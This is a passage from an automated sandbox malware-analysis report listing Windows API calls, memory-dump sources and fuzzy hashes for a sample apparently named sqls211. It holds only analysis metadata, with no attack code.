                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: a4fb70863a754f621f2ea21c9e6be61f7b6f83168f89d70428f32a2133dcf172
                                                                                                            • Instruction ID: ccc3e3d4dad10b8ecf855a7ff79b3b6d63994212939fd25b90ef046922017369
                                                                                                            • Opcode Fuzzy Hash: a4fb70863a754f621f2ea21c9e6be61f7b6f83168f89d70428f32a2133dcf172
                                                                                                            • Instruction Fuzzy Hash: ADF089325051E577DB215B23AD15BBF7748AF41770B189221FC28D7194CB70DE0196E0
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00CE3C3F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 190572456-0
                                                                                                            • Opcode ID: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                                                                            • Instruction ID: 54bc5e34ec55069b1d0ad9591c5cd6fe9b2d83cceea6c986e8d265f5f70416a9
                                                                                                            • Opcode Fuzzy Hash: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                                                                            • Instruction Fuzzy Hash: 50F0EC322003D6AFCF114E6AEC08A9A7799EF05B617204225FA25E7190DB31FB20D7A0
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 91cf318ede46b0b1883a792a0e8d36a7958d6524e5ea403449398024528df6cc
                                                                                                            • Instruction ID: 7ada6ce07a8dbf83b07d9e6e4def2aa53132b651da481db04842e52c71dfdf8c
                                                                                                            • Opcode Fuzzy Hash: 91cf318ede46b0b1883a792a0e8d36a7958d6524e5ea403449398024528df6cc
                                                                                                            • Instruction Fuzzy Hash: 86E06D3A2062E567EA7127679D05BAF76499B427B4F150121BC2C97191CF60CE0592E1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC5AC2
                                                                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                                                                            • Instruction ID: f57993e6aac6344007171e647144eec5a3d76b19c30e47a6edccf918f6c4f901
                                                                                                            • Opcode Fuzzy Hash: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                                                                            • Instruction Fuzzy Hash: 4C018C30810794DAD725F7B8C0417EDFBA49F64304F68848EA95653382CBB46B09E7A2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                                                                              • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                                                                              • Part of subcall function 00CCA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1464966427-0
                                                                                                            • Opcode ID: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                                                                            • Instruction ID: 32c283802877f1229fdfe14fcd86076f67a26e894a71bfe1e0b321be27d71cc8
                                                                                                            • Opcode Fuzzy Hash: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                                                                            • Instruction Fuzzy Hash: A4F08232408794BACB2257B4C909FDB7B906F1A339F04CA4EF1FD52196C2755494AB23
                                                                                                            APIs
                                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00CD0E3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExecutionStateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2211380416-0
                                                                                                            • Opcode ID: a78e2fba374cc9e2f50d97465ec87a48903b78118ced432400e4f05cd8da11ac
                                                                                                            • Instruction ID: 3a7886db9a5b74c353ab8a8bed5ffb4bbb9e2685abf7b9c34ebf2ed297013d6e
                                                                                                            • Opcode Fuzzy Hash: a78e2fba374cc9e2f50d97465ec87a48903b78118ced432400e4f05cd8da11ac
                                                                                                            • Instruction Fuzzy Hash: 9ED0C25060109436EA1137286915BFE26068FC6311F0C002BF68957782CE840886B272
                                                                                                            APIs
                                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                                                                              • Part of subcall function 00CDA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                            • String ID:
                                                                                                            • API String ID: 1915507550-0
                                                                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                            • Instruction ID: 03f77114d4934992448d000375a7d1f5fd8bb19fd6de9630e77b2c3b179e8863
                                                                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                            • Instruction Fuzzy Hash: 63D0C771214209BADF416B61CC1297E7595EB01340F048127BA41D5351EAF1D911A556
                                                                                                            APIs
                                                                                                            • DloadProtectSection.DELAYIMP ref: 00CDE5E3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DloadProtectSection
                                                                                                            • String ID:
                                                                                                            • API String ID: 2203082970-0
                                                                                                            • Opcode ID: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                                                                            • Instruction ID: 3120791142763dc701e80dd8d2fe227639f1cd239e8251bb4e21796bdc6e6ef1
                                                                                                            • Opcode Fuzzy Hash: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                                                                            • Instruction Fuzzy Hash: 92D0A9BC0882408AC212FBA8A8827187250B330B44F804153F334C9390EA6080C2F622
                                                                                                            APIs
                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CD1B3E), ref: 00CDDD92
                                                                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010424,?), ref: 00CDB59E
                                                                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                            • String ID:
                                                                                                            • API String ID: 897784432-0
                                                                                                            • Opcode ID: 9a506bdab83e35a1f69e42334b8cb36ff047c4af97822df4bef8f055e586bc85
                                                                                                            • Instruction ID: e531e7e2424602b1463601a810f241704a60473cea15213258143b83ed08ea89
                                                                                                            • Opcode Fuzzy Hash: 9a506bdab83e35a1f69e42334b8cb36ff047c4af97822df4bef8f055e586bc85
                                                                                                            • Instruction Fuzzy Hash: 85D09E31144300BAD6122B51DD06F0A7AA2AB98B04F404555B384741B286729D31EF11
                                                                                                            APIs
                                                                                                            • GetFileType.KERNELBASE(000000FF,00CC97BE), ref: 00CC98C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3081899298-0
                                                                                                            • Opcode ID: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                                                                            • Instruction ID: 90c4875ed8baf03cd8750f7532d88da876f26329fb6392be1beab35c92f1e97a
                                                                                                            • Opcode Fuzzy Hash: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                                                                            • Instruction Fuzzy Hash: 93C01234800145958E204624D84C6997711EA53365BB486D8C0388A0E1C332CD47EA01
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                                                                            • Instruction ID: 9ce15e9890fb3a5c607f063160668b835430f537d228528e8dc45fe39d4a87ca
                                                                                                            • Opcode Fuzzy Hash: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                                                                            • Instruction Fuzzy Hash: 00B012D535C244BC3104314A2D42C3B010CC0C1B28330843FFE01C86C1D840AC103832
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                                                                            • Instruction ID: cc07e88e0541398dd6d04932ef4a4972d2b24716ddb40f41c925dd842d458061
                                                                                                            • Opcode Fuzzy Hash: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                                                                            • Instruction Fuzzy Hash: A5B012D535C248AC3144714E2D42C3B010CC0C0B28330403FFA05C83C1D8406C103932
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                                                                            • Instruction ID: 8c101ed0473f597e093d72fa7a866f0a20d50b8a6de4be5e3516e933685b9e89
                                                                                                            • Opcode Fuzzy Hash: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                                                                            • Instruction Fuzzy Hash: 9DB012D135C244AC3144720A2D02C3B010CC0C1B28330C03FFE09C83C1D840AC043432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                                                                            • Instruction ID: 98e1d1531db4a489c56d3a40a5c3688a3ddbaae7d986e228578123b867f628a7
                                                                                                            • Opcode Fuzzy Hash: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                                                                            • Instruction Fuzzy Hash: DBB012E135C154AC3144710A2E03C3B018CC0C0B28330403FFA05C83C1DC406D013432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                                                                            • Instruction ID: 38709f3a1525955a5090fee80ce97513b68b79b595965d2b3fedc11caa7895bb
                                                                                                            • Opcode Fuzzy Hash: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                                                                            • Instruction Fuzzy Hash: 75B012D135D184AC3148710A2D02C3B010DC0C1B28330803FFE05C83C1D840AC403432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
